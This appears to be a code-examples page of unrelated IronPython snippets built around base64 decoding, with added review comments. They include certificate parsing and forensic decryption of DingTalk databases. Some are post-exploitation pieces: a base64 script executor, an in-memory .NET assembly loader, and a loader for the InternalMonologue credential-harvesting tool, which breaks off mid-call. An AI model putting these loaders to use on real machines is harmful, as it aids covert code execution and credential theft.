Exemple #1
 def check_key(key, src):
     """Tell whether *key* decrypts the first block of *src* to the SQLite magic.

     The first 16 bytes of ``src.Data`` are decrypted with Rijndael in ECB
     mode without padding and compared with the 16-byte SQLite header
     (``SQLite format 3`` followed by a NUL byte).

     NOTE(review): ECB with no padding is presumably dictated by the format
     of the file being examined; it gives no integrity protection, so a
     header match is the only evidence that the key is right.
     """
     cipher = RijndaelManaged()
     # The base64 round trip turns the Python byte string into a .NET byte array.
     cipher.Key = Convert.FromBase64String(base64.b64encode(key))
     cipher.Mode = CipherMode.ECB
     cipher.Padding = PaddingMode.None
     decryptor = cipher.CreateDecryptor()
     stream = src.Data
     stream.seek(0)
     first_block = stream.read(16)
     first_block = Convert.FromBase64String(base64.b64encode(first_block))
     plain = decryptor.TransformFinalBlock(first_block, 0, 16)
     name = str(bytes(plain))
     # NOTE(review): this echoes the decrypted header to stdout on every call.
     print name
     return name == "SQLite format 3\0"
Exemple #2
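 def aes_decrypt(src, dst, key):
     """Decrypt ``src.Data`` block by block into the file *dst*.

     Each 16-byte block is decrypted independently with Rijndael in ECB mode
     and no padding, using *key*. ``src.Size`` bounds the loop.

     NOTE(review): reading starts at the stream's current position (no seek
     is done here), and a size that is not a multiple of 16 would make the
     last ``TransformFinalBlock`` call fail on a short read. ECB provides no
     integrity check, so the output is not verified in any way.
     """
     rm = RijndaelManaged()
     # The base64 round trip turns the Python byte string into a .NET byte array.
     rm.Key = Convert.FromBase64String(base64.b64encode(key))
     rm.Mode = CipherMode.ECB
     rm.Padding = PaddingMode.None
     tr = rm.CreateDecryptor()
     # The context manager closes dst even when a read or a transform raises;
     # the original left the handle open on any error.
     with open(dst, 'wb') as f:
         data = src.Data
         sz = src.Size
         idx = 0
         while idx < sz:
             bts = data.read(16)
             bts = Convert.FromBase64String(base64.b64encode(bts))
             t_r = tr.TransformFinalBlock(bts, 0, 16)
             f.write(t_r)
             idx += 16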
Exemple #3
 def run_script(self, data):
     """Execute a base64-encoded script in a new IronPython engine.

     Both standard output and error output of the engine are redirected into
     one ``MuhStream``; its ``string`` attribute is returned.

     NOTE(review): the decoded text is executed as code and nothing in this
     method validates it. Whatever supplies *data* gets full code execution
     in this process, so the channel it arrives on must be authenticated and
     integrity-protected by the caller.
     """
     decoded = Convert.FromBase64String(data)
     source_text = Encoding.UTF8.GetString(decoded)
     captured = MuhStream()
     py_engine = Python.CreateEngine()
     py_engine.Runtime.IO.SetOutput(captured, Encoding.UTF8)
     py_engine.Runtime.IO.SetErrorOutput(captured, Encoding.UTF8)
     # Scope injection was left disabled by the author:
     #scope = engine.CreateScope()
     #scope.SetVariable("client", self)
     py_engine.Execute(source_text)
     return captured.string
Exemple #4
 def decode_job(self, job):
     """Decode ``job['data']``: base64 -> gzip -> UTF-8 JSON -> object.

     The first two decoded bytes are overwritten with the gzip magic
     (``1f 8b``) before decompression, so whatever the sender put there is
     discarded.

     NOTE(review): decompression copies the whole stream with no size limit,
     so a small input can expand to an arbitrarily large buffer; cap the
     output if *job* can come from an untrusted peer.
     """
     raw = Convert.FromBase64String(job['data'])
     raw[:2] = Array[Byte](bytearray(b"\x1f\x8b"))
     with MemoryStream(raw.Length) as packed:
         packed.Write(raw, 0, raw.Length)
         packed.Seek(0, SeekOrigin.Begin)
         with GZipStream(packed, CompressionMode.Decompress) as gunzip, \
                 MemoryStream() as unpacked:
             gunzip.CopyTo(unpacked)
             serializer = JavaScriptSerializer()
             text = Encoding.UTF8.GetString(unpacked.ToArray())
             return serializer.DeserializeObject(text)
Exemple #5
def DecodeBase64File(Data, FileName, FilePath="C:\\WINDOWS\\Temp\\"):
    """Decode base64 *Data* and write it to ``FilePath + FileName``.

    Returns a message naming the path that was written.

    NOTE(review): the path is built by plain concatenation. *FilePath* must
    end with a separator, and *FileName* is not checked for directory
    components, so a name containing ``..\\`` lands outside *FilePath*.
    Validate the name before calling this with untrusted input.
    """
    path = "{}{}".format(FilePath, FileName)
    payload = Convert.FromBase64String(Data)
    File.WriteAllBytes(path, payload)
    message = 'File copied to: {}'.format(path)
    return message
from System.Reflection import Assembly
from System.Text import Encoding
from System import Array, Object, String, Convert, Console
from System.IO import StreamWriter, MemoryStream

# Template script: "ASSEMBLY_BASE64" and "ARGS" look like placeholders that
# are substituted before this runs -- TODO confirm against the generator.
encoded_assembly = "ASSEMBLY_BASE64"

# The assembly is loaded from the decoded byte array rather than from a file
# path. For defenders: visibility of this step comes from .NET runtime
# telemetry rather than from on-disk scanning.
assembly = Assembly.Load(Convert.FromBase64String(encoded_assembly))
# One Object[] holding a single String[]: the argument list passed to the
# entry point through reflection.
args = Array[Object]([Array[String](["ARGS"])])

# For some reason if we don't set the console output back to stdout after executing the assembly IronPython throws a fit
orig_out = Console.Out
orig_error = Console.Error

# NOTE(review): the console streams are restored only on the normal path; if
# Invoke raises, Console.Out/Console.Error stay pointed at the StreamWriter.
with MemoryStream() as ms:
    with StreamWriter(ms) as sw:
        Console.SetOut(sw)
        Console.SetError(sw)
        assembly.EntryPoint.Invoke(None, args)
        # Flush so everything written by the assembly is in ms before reading it.
        sw.Flush()
        buffer = ms.ToArray()
        print Encoding.UTF8.GetString(buffer, 0, buffer.Length)
        Console.SetOut(orig_out)
        Console.SetError(orig_error)
    def parse(self):
        """Parse the base64 DER certificate held by this object into flat records.

        Returns a tuple ``(certificates, oids)``. ``certificates`` holds at
        most one dict with the serial number, selected subject fields, the
        SHA-1 thumbprint, validity dates, the issuer common name and the
        original base64 text. ``oids`` holds one dict per extended-key-usage
        OID and per subject/issuer attribute. Any failure is reported only as
        ``error sign!`` on stdout and whatever was collected so far is returned.

        Nothing here validates the certificate's signature, chain or validity
        period; the extracted values are only as trustworthy as the input.
        """
        cleanup_pairs = (('\n', ''), ('\r', ''), ('\t', ''), ('|', '/'),
                         ('"', ''), ('  ', ''), ('NULL', ''), (';', ','))
        known_oids = {
            '1.2.643.3.131.1.1': 'INN',
            '1.2.643.100.1': 'OGRN',
            '1.2.643.100.3': 'SNILS',
            '1.2.840.113549.1.9.2': 'orgRequisites',
        }
        requisite_labels = ('INN=', 'KPP=', 'OGRN=', 'ИНН=', 'КПП=', 'ОГРН=',
                            'ОГРНИП=', 'OGRNIP', ' ')

        def getvalue(tag):
            # Strip line breaks, tabs, quotes and delimiter characters from an
            # attribute value; anything that cannot be cleaned becomes ''.
            try:
                for old, new in cleanup_pairs:
                    tag = tag.replace(old, new)
            except:
                return ''
            return tag

        def get_oid(name):
            # Short label for the OIDs handled specially here, else the OID itself.
            return known_oids.get(name, name)

        def label_of(attr):
            return oid2name.get(attr.oid) or get_oid(attr.oid.dotted_string)

        def values_of(name, wanted):
            return [getvalue(attr.value) for attr in name if label_of(attr) == wanted]

        def requisite(parts, index, lengths):
            # The part at *index* when its length is an accepted one, else ''.
            try:
                part = parts[index]
                if len(part) in lengths:
                    return part
            except:
                pass
            return ''

        certificates = []
        oid_rows = []
        # NOTE(review): _OID_NAMES is a private table of the x509 package.
        oid2name = x509.oid._OID_NAMES

        entity = {}
        try:
            data = Convert.FromBase64String(self.__base64)
            temp_cert = X509Certificates.X509Certificate(data)
            cert = x509.load_der_x509_certificate(bytes(temp_cert.GetRawCertData()),
                                                  default_backend())
            data = None
            entity['serial'] = temp_cert.GetSerialNumberString()
            temp_cert = None

            # Subject information
            entity['Subject_SNILS'] = ''.join(values_of(cert.subject, 'SNILS'))
            entity['Subject_orgRequisites'] = ''.join(
                [v.replace('-', '/') for v in values_of(cert.subject, 'orgRequisites')])
            stripped = entity['Subject_orgRequisites']
            for label in requisite_labels:
                stripped = stripped.replace(label, '')
            requisites = stripped.strip().split('/')

            # INN, KPP and OGRN are taken from orgRequisites by position and
            # length; INN and OGRN fall back to their own subject attributes.
            inn = requisite(requisites, 0, (10, 12))
            if inn == '':
                inn = ''.join(values_of(cert.subject, 'INN'))
            entity['Subject_INN'] = inn

            entity['Subject_KPP'] = requisite(requisites, 1, (9,))

            ogrn = requisite(requisites, 2, (13, 15))
            if ogrn == '':
                ogrn = ''.join(values_of(cert.subject, 'OGRN'))
            entity['Subject_OGRN'] = ogrn

            entity['Subject_CommonName'] = ''.join(values_of(cert.subject, 'commonName'))
            entity['Subject_Department'] = '; '.join(
                values_of(cert.subject, 'organizationalUnitName'))
            entity['Subject_region'] = ''.join(values_of(cert.subject, 'stateOrProvinceName'))
            entity['Subject_city'] = ''.join(values_of(cert.subject, 'localityName'))
            entity['Subject_streetAddress'] = ''.join(values_of(cert.subject, 'streetAddress'))

            entity['Subject_email'] = ''.join(values_of(cert.subject, 'emailAddress'))
            entity['Subject_User'] = ''.join(values_of(cert.subject, 'surname'))
            entity['Subject_User'] += ' ' + ''.join(values_of(cert.subject, 'givenName'))
            entity['Subject_UserPost'] = ''.join(values_of(cert.subject, 'title'))

            # The SHA-1 digest is used as a record identifier (thumbprint).
            entity['Thumb'] = str(cert.fingerprint(hashes.SHA1()).hex().upper())
            entity['ValidFrom'] = cert.not_valid_before.strftime('%Y-%m-%d')
            entity['ValidTo'] = cert.not_valid_after.strftime('%Y-%m-%d')

            # Issuer information
            entity['Issuer_CN'] = ''.join(values_of(cert.issuer, 'commonName'))

            entity['sign'] = self.__base64
            try:
                eku = cert.extensions.get_extension_for_oid(ExtensionOID.EXTENDED_KEY_USAGE)
                for usage in eku.value:
                    oid_rows.append({
                        'Thumb': entity['Thumb'],
                        'oid': usage.dotted_string,
                        'value': '',
                        'type': 'extensions',
                    })
            except:
                # A certificate without this extension simply yields no rows.
                pass

            for kind, name in (('subject', cert.subject), ('issuer', cert.issuer)):
                for rdn in name.rdns:
                    for attr in rdn:
                        oid_rows.append({
                            'Thumb': entity['Thumb'],
                            'oid': attr.oid.dotted_string,
                            'value': (getvalue(attr.value) or ''),
                            'type': kind,
                        })

            certificates.append(entity)
            print(entity['Thumb'])

        except Exception as e:
            # NOTE(review): the exception itself is discarded; only this marker is printed.
            print('error sign!')

        return certificates, oid_rows
Exemple #8
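 def search_account(self):
     """Find per-account databases under ``Documents/db`` and decrypt them.

     The device id is read from the ``UTDID`` entry of the preferences
     plist. For every directory whose name passes ``check_is_md5`` and that
     contains ``db.sqlite``, a 16-character key is taken from the middle of
     ``md5(device_id + directory_name)`` and used to decrypt ``db.sqlite``
     and, when present, ``db.sqlite_fts`` into the cache directory. The path
     of each decrypted main database is appended to ``self.result_sql``.

     Returns None; problems with the preferences node are only logged.
     """
     pre_node = self.root.GetByPath(
         'Library/Preferences/com.laiwang.DingTalk.plist')
     if pre_node is None:
         self.log_print('''Can't find preferences node, parse exits!''')
         return
     bp = BPReader(pre_node.Data).top
     if bp['UTDID'] is None:
         self.log_print("EXCEPTION OF NONE DATA!")
         return
     device_id = bp['UTDID']['UTDID'].Value
     abs_path = self.root.PathWithMountPoint
     sql_dir = os.path.join(abs_path, 'Documents/db')
     scops = [
         entry for entry in os.listdir(sql_dir)
         if self.check_is_md5(entry)
         and os.path.exists(os.path.join(sql_dir, '{}/db.sqlite'.format(entry)))
     ]
     if self.is_scripts:
         cache = ds.OpenCachePath('Dingtalk')
     else:
         # NOTE(review): hard-coded fallback directory; it must already exist.
         cache = "D:/cache"

     def _decrypt_blocks(node, out, transform):
         # Decrypt node.Data into out, one independent 16-byte block at a time.
         data = node.Data
         sz = node.Size
         idx = 0
         while idx < sz:
             bts = Convert.FromBase64String(base64.b64encode(data.read(16)))
             out.write(transform.TransformFinalBlock(bts, 0, 16))
             idx += 16

     for i in scops:
         # 16 hex characters of the digest serve as the raw cipher key.
         key = hashlib.md5(device_id + i).hexdigest()[8:24]
         dest_sql = os.path.join(cache, '{}.sqlite'.format(i))
         dest_sql_fts = os.path.join(cache, '{}.sqlite_fts'.format(i))
         # Both outputs are still created up front, as before, but the context
         # managers now close them on every path, including the early
         # `continue`s and any exception while decrypting.
         with open(dest_sql, 'wb') as f_dest, open(dest_sql_fts, 'wb') as f_dest_fts:
             source_node = self.root.GetByPath(
                 'Documents/db/{}/db.sqlite'.format(i))
             source_node_fts = self.root.GetByPath(
                 'Documents/db/{}/db.sqlite_fts'.format(i))
             if source_node is None:
                 continue
             # NOTE(review): this writes the derived key to stdout; drop it if
             # that output is captured in logs.
             print(key)
             rm = RijndaelManaged()
             # The base64 round trip turns the Python string into a .NET byte array.
             rm.Key = Convert.FromBase64String(base64.b64encode(key))
             rm.Mode = CipherMode.ECB
             rm.Padding = PaddingMode.None
             tr = rm.CreateDecryptor()
             _decrypt_blocks(source_node, f_dest, tr)
             # Close before publishing the path so consumers see a complete file.
             f_dest.close()
             self.result_sql.append(dest_sql)
             # for further using...
             if source_node_fts is None:
                 continue
             _decrypt_blocks(source_node_fts, f_dest_fts, tr)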
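def parse(**kwargs):
    """Parse one base64 DER certificate and append its records to shared lists.

    Expected keyword arguments, as read by the body:
        sign: base64 text of the certificate.
        mutex: lock object with ``acquire()``/``release()``.
        certificates: shared list that receives the certificate dict.
        oids: shared list that receives the per-OID dicts.

    A certificate that fails to parse is skipped silently (best effort).
    Nothing here validates the certificate's signature, chain or validity
    period; the extracted values are only as trustworthy as the input.
    """
    # Result lists and the OID-to-name table.
    # NOTE(review): _OID_NAMES is a private table of the x509 package.
    X509list = []
    X509OIDsList = []
    oid2name = x509.oid._OID_NAMES

    # Container for the fields of this certificate.
    X509Entity = {}

    def _label(attr):
        return oid2name.get(attr.oid) or get_oid(attr.oid.dotted_string)

    def _values(name, wanted):
        return [getvalue(attr.value) for attr in name if _label(attr) == wanted]

    def _requisite(parts, index, lengths):
        # The part at *index* when its length is an accepted one, else ''.
        try:
            part = parts[index]
            if len(part) in lengths:
                return part
        except Exception:
            pass
        return ''

    try:
        # Decode the base64 text into a byte array and wrap it.
        data = Convert.FromBase64String(kwargs['sign'])
        data = X509Certificates.X509Certificate(data)
        X509Entity['serial'] = data.GetSerialNumberString()
        X509Entity['sign'] = kwargs['sign']
        cert = x509.load_der_x509_certificate(bytes(data.GetRawCertData()), default_backend())
        data = None

        # Subject information
        X509Entity['Subject_SNILS'] = ''.join(_values(cert.subject, 'SNILS'))
        X509Entity['Subject_orgRequisites'] = ''.join(
            [v.replace('-', '/') for v in _values(cert.subject, 'orgRequisites')])
        requisites = X509Entity['Subject_orgRequisites']
        for label in ('INN=', 'KPP=', 'OGRN=', 'ИНН=', 'КПП=', 'ОГРН=',
                      'ОГРНИП=', 'OGRNIP', ' '):
            requisites = requisites.replace(label, '')
        requisites = requisites.strip().split('/')

        # INN, KPP and OGRN are taken from orgRequisites by position and
        # length; INN and OGRN fall back to their own subject attributes.
        inn = _requisite(requisites, 0, (10, 12))
        if inn == '':
            inn = ''.join(_values(cert.subject, 'INN'))
        X509Entity['Subject_INN'] = inn

        X509Entity['Subject_KPP'] = _requisite(requisites, 1, (9,))

        ogrn = _requisite(requisites, 2, (13, 15))
        if ogrn == '':
            ogrn = ''.join(_values(cert.subject, 'OGRN'))
        X509Entity['Subject_OGRN'] = ogrn

        X509Entity['Subject_CommonName'] = ''.join(_values(cert.subject, 'commonName'))

        # Departments are de-duplicated while keeping first-seen order.
        department = []
        for value in _values(cert.subject, 'organizationalUnitName'):
            if value not in department:
                department.append(value)
        X509Entity['Subject_Department'] = '; '.join(department)

        X509Entity['Subject_region'] = ''.join(_values(cert.subject, 'stateOrProvinceName'))
        X509Entity['Subject_city'] = ''.join(_values(cert.subject, 'localityName'))
        X509Entity['Subject_streetAddress'] = ''.join(_values(cert.subject, 'streetAddress'))

        X509Entity['Subject_email'] = ''.join(_values(cert.subject, 'emailAddress'))
        X509Entity['Subject_User'] = ''.join(_values(cert.subject, 'surname'))
        X509Entity['Subject_User'] += ' ' + ''.join(_values(cert.subject, 'givenName'))
        X509Entity['Subject_UserPost'] = ''.join(_values(cert.subject, 'title'))

        # The SHA-1 digest is used as a record identifier (thumbprint).
        X509Entity['Thumb'] = str(cert.fingerprint(hashes.SHA1()).hex().upper())
        X509Entity['ValidFrom'] = cert.not_valid_before.strftime('%Y-%m-%d')
        X509Entity['ValidTo'] = cert.not_valid_after.strftime('%Y-%m-%d')

        # Issuer information
        X509Entity['Issuer_CN'] = ''.join(_values(cert.issuer, 'commonName'))

        try:
            for x in cert.extensions.get_extension_for_oid(ExtensionOID.EXTENDED_KEY_USAGE).value:
                X509OIDsList.append({
                    'Thumb': X509Entity['Thumb'],
                    'oid': x.dotted_string,
                    'value': '',
                    'type': 'extensions',
                })
        except Exception:
            # A certificate without this extension simply yields no rows.
            pass

        for kind, name in (('subject', cert.subject), ('issuer', cert.issuer)):
            for rdn in name.rdns:
                for attr in rdn:
                    X509OIDsList.append({
                        'Thumb': X509Entity['Thumb'],
                        'oid': attr.oid.dotted_string,
                        'value': (getvalue(attr.value) or ''),
                        'type': kind,
                    })

        X509list.append(X509Entity)
        print(X509Entity['Thumb'])
    except Exception:
        # Best effort: an unparsable certificate contributes nothing.
        pass

    if X509list:
        kwargs['mutex'].acquire()
        try:
            kwargs['certificates'].extend(X509list)
            kwargs['oids'].extend(X509OIDsList)
        finally:
            # Release even if a shared list is missing or extend() fails;
            # otherwise every other worker would block on the mutex forever.
            kwargs['mutex'].release()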
Exemple #10
 def set_plot(self, fig):
     """Show *fig* in ``self.PlotImage``.

     The figure is passed through ``base64_fig``, the resulting base64 text
     is decoded to a .NET byte array, and ``stream_bitmap`` turns those bytes
     into the image source.
     """
     encoded = base64_fig(fig)
     raw_bytes = Convert.FromBase64String(encoded)
     self.PlotImage.Source = stream_bitmap(raw_bytes)
Exemple #11
    with MemoryStream(compressed.Length) as inputStream:
        inputStream.Write(compressed, 0, compressed.Length)
        inputStream.Seek(0, SeekOrigin.Begin)
        with MemoryStream() as outputStream:
            with DeflateStream(inputStream, CompressionMode.Decompress) as deflateStream:
                buffer = Array.CreateInstance(Byte, 4096)
                bytesRead = deflateStream.Read(buffer, 0, buffer.Length)
                outputStream.Write(buffer, 0, bytesRead)
                while bytesRead != 0:
                    bytesRead = deflateStream.Read(buffer, 0, buffer.Length)
                    outputStream.Write(buffer, 0, bytesRead)

                return outputStream.ToArray()


assembly = Assembly.Load(Decompress(Convert.FromBase64String(InternalMonologueDLL)))
clr.AddReference(assembly)
from InternalMonologue.Class1 import Main

orig_out = Console.Out
orig_error = Console.Error

with MemoryStream() as ms:
    with StreamWriter(ms) as sw:
        Console.SetOut(sw)
        Console.SetError(sw)
        Main(impersonate=,
             threads=,
             downgrade=,
             restore=,
             challenge=,